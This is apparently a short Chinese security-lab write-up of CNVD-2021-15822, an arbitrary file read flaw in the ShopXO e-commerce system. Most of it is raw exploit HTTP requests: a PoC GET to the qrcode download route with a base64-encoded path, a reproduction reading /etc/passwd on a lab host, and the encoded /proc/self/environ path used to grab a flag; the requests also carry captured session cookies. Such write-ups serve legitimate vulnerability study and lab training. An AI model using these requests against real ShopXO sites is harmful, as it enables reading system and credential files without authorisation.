【初级】shopxo 文件读取

CNVD-2021-15822

漏洞描述:ShopXO是一套开源的企业级开源电子商务系统。 ShopXO存在任意文件读取漏洞,攻击者可利用该漏洞获取敏感信息

影响版本:ShopXO版本

参考资料:

POC:

GET /public/index.php?s=/index/qrcode/download/url/文件路径base64编码HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_b5514a35664fd4ac6a893a1e56956c97=1635834194,1635834251; grafana_session=4ed2fe8aecc214c9bbb634d8399014fb; Hm_lvt_deaeca6802357287fb453f342ce28dda=1640670569; ajs_user_id=null; ajs_group_id=null; ajs_anonymous_id=%2229814a38-17f9-413d-ad48-e704ca23ede6%22; PHPSESSID=jskl7f1mghrjlvsc8d7ctlt4j6; SECKEY_ABVK=dZF+HPOlvzzkwiS3ULsWzkjw4oNoZP3kMhRN02hlMEI%3D; BMAP_SECKEY=a52c397851ec0df6cb484b1d2c453acc49624b58896cb16fca4c15a2a5a330f41d048e40401107e5d699a5592f90abea5c64379815179d8bc02cbfd533f1c2784e84874764b6b40a032b23dbff4e931ed7413db121a2b52266f9290f239991ecce81595bf8b1ec1c3add56d6d7a9d1b87690ec447ec7359de0c799eafbaff605e058b6494a4df2b0d9b55365d4e0a5a8f6b1e541f01e99cd55369bee3dcc7f4a4a21514067b0064068c73d6609ca9562f3eea532cb3189fee339388c1217e1fd5075f080068a7657f15896598309cee7485b7219a70ca86d2017448104c526a28b2c55819909c6bc522a500f62c70c80
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 2

漏洞复现

GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1

Host: 123.58.224.8:30486

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,en;q=0.7,en-US;q=0.3

Accept-Encoding: gzip, deflate

Connection: close

Cookie: CFID=2; CFTOKEN=93764139; SESS9a92796fbbf402e5189b6cde597e27db=twWuG03KFwpWXVpqYUDo2Clm4VpvZqk0OPFD2tWOavg; Drupal.toolbar.collapsed=0; PHPSESSID=b77vgpktbaje1mft78m4cuch27

Upgrade-Insecure-Requests: 1
图片[1]-【初级】shopxo 文件读取-NGC660 安全实验室
  • 读取flag
    • /proc/self/environ
    • L3Byb2Mvc2VsZi9lbnZpcm9u
© 版权声明
THE END
喜欢就支持一下吧
点赞6 分享